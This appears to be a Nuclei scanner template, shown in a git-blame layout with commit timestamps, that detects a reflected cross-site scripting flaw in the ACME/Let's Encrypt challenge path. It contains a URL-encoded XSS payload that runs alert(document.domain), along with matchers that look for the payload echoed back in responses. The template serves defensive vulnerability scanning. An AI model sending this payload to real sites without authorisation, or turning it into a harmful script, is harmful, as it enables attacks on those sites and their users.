2021-01-10 13:11:25 +00:00
|
|
|
id: acme-xss
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: ACME / Let's Encrypt Reflected XSS
|
2021-04-06 06:46:11 +00:00
|
|
|
author: pdteam
|
2021-09-20 05:11:56 +00:00
|
|
|
severity: medium
|
2021-02-12 05:53:01 +00:00
|
|
|
tags: xss,acme
|
2021-01-10 13:11:25 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E'
|
2021-01-10 22:01:24 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
2021-01-10 13:11:25 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<?xml version=\"1.0\"?><x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>"
|
|
|
|
- type: word
|
2021-01-10 22:01:24 +00:00
|
|
|
words:
|
2021-01-10 13:11:25 +00:00
|
|
|
- "/xml"
|
|
|
|
- "/html"
|